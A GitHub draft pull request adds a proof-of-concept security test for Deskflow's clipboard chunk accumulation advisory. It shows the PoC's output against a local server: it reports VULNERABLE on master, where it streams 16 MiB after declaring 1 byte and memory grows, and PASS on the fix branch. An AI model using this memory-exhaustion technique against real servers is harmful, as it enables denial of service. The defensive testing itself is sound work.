Skip to content

test(security): add poc for clipboard chunk accumulation (GHSA-jf7g-qghg-p54x)#13

Draft
nbolton wants to merge 1 commit into
mainfrom
poc/clip-exhaust
Draft

test(security): add poc for clipboard chunk accumulation (GHSA-jf7g-qghg-p54x)#13
nbolton wants to merge 1 commit into
mainfrom
poc/clip-exhaust

Conversation

@nbolton

@nbolton nbolton commented Jul 3, 2026

Copy link
Copy Markdown
Member

GHSA-jf7g-qghg-p54x

Master:

./cve_XXXX_XXXXX_clipboard_exhaustion.py
CVE-XXXX-XXXXX - unbounded clipboard chunk accumulation (GHSA-jf7g-qghg-p54x)
target: 127.0.0.1:24800  name: 'deskflow-poc'  transport: tls
declaring 1 byte(s), streaming 16 MiB (configured limit 3 MiB)
sampling rss of server pid 1495024

    streamed 16 MiB
  accepted: 16 MiB (16777216 bytes), peer alive after stream: True
  server rss: 70 -> 88 MiB (delta 18 MiB, threshold 8 MiB)
[FAIL] server retained the oversized buffer (rss grew 19009536 bytes) - VULNERABLE (GHSA-jf7g-qghg-p54x)

https://github.com/deskflow/deskflow-ghsa-jf7g-qghg-p54x/pull/1

./cve_XXXX_XXXXX_clipboard_exhaustion.py
CVE-XXXX-XXXXX - unbounded clipboard chunk accumulation (GHSA-jf7g-qghg-p54x)
target: 127.0.0.1:24800  name: 'deskflow-poc'  transport: tls
declaring 1 byte(s), streaming 16 MiB (configured limit 3 MiB)
sampling rss of server pid 1512557

    streamed 16 MiB
  accepted: 16 MiB (16777216 bytes), peer alive after stream: True
  server rss: 69 -> 72 MiB (delta 2 MiB, threshold 8 MiB)
[PASS] server rss stayed flat - oversized data discarded on receive

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant